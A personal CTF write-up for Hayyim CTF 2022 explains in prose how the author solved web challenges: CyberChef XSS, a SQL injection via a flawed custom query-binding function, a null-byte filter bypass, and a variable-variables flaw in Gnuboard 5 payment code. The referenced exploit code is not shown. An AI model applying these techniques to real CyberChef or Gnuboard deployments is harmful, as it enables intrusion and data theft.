Hayyim CTF 2022 Write Up
2022-02-13 23:29:53

### Summary

This weekend, Hayyim Security hosted the CTF, and I participated in it for about 3 ~ 4 hours and I was solved Cyberchef, Not E and Cyber Headchef challenges.

### (Web) Cyberchef [100 pts]

The Cyberchef is a simple XSS challenge. Cyberchef service is open source that provides encryption/decryption service and has 1-Day vulnerability.

1-Day issues can be found here. And I was able to get the flag by sending the above PoC to the admin bot.

### (Web) Not E [158 pts]

The Not E challenge is a SQL Injection issue. In this problem, we are using our own binding function, not the Prepared Binding function provided by sqlite of Node, and this function has a vulnerability.

I could see the FLAG were stored in a table called flag. So, in order to solve this challenge, we have to use SQL Injection to leak the flags contained in the table. Otherwise, read the /flag file using RCE, but this is not possible. Therefore, we should focus on SQL Injection.

• /logout
• /new
• /view/:noteId

First, the functions provided by the Note service are login, post writing, and post reading functions.

And all input values are type checked by checkParam function.

In addition, all sql queries are using custom binding function. I thought there was a weakness here. The reason is that the server uses the custom binding function even though the node’s sqlite provides the binding function.

In the formatQuery() function, after using the JSON.stringify() method to convert the input value into a string, you can see that the generated value and ‘?’ are replaced.

When JSON.stringify() is used, double quotation marks(“) are added to both ends of the string as shown above.

If you use the writing function and pass a question mark character as the value of title, the query is created as above. And when you check the value of the second argument of the query, you can see that a question mark is created after the string (“”), and the value of content is replaced with the question mark randomly generated. so you can escape the double quarter by this.

Finally I wrote the exploit code as above

### (Web) Cyber Headchef [390 pts]

The Cyber Headchef challenge is Cyberchef’s v2 and this is a 0-Day Challenge. (This is an unintended solution)

This is filtering the characters called chart among the function names used in the 1-Day exploit. But this can be bypassed using null byte injection

So I was able to get the flag by sending the above PoC to the admin bot.

### (Web/Not Solve) Gnuboard [498 pts]

The Gnuboard challenge is to solve it using 0-Day. This challenge was so difficult that I couldn’t solve it while the competition was in progress, and after the competition I asked as3617.

I could see in the docker file that the latest version of Gnuboard 5 was being used, and the flag was defined as a variable called $flag in common.php. So, after a long time, I started to analyze GnuBoard and found the SQL Injection vector, but it might not work well, and even if SQL Injection occurs, I don’t think I can do anything using it. So I had to give up. Hayyim Security provided a hint because there was no solver for the challenge. Hint mentioned the payment part. The above code is the Kakao Pay payment logic. The important thing here is to use the try/catch statement, and the vulnerability occurs in the catch statement. The code above is executed when payment fails. Send a request to$netCancle using the $httpUtil->processHTTP() function, and store the return value in the$netcancelResultString variable. After that, I could see that variable variables were used twice in total by using the str_replace() function.

If the string called authToken is included in the value of $netcancelResultString after http request as above When the str_replace() function is called for the first time, the string called flag will be saved as the value of the$netcancelResultString variable by variable variables. ($authToken is flag) The second time the str_replace() function is called, the value of the$$netcancelResultString variable is the same as$flag, so the flag saved in common.php will be saved in the \$netcancelResultString variable.

In order to generate an error, pass an incorrect URL as the value of authUrl.

Finally I got the flags by sending a request like above.

Thanks to Hayyim Security for making these fun challenges. It’s been a long time since I studied a lot.

2022-02-13 23:29:53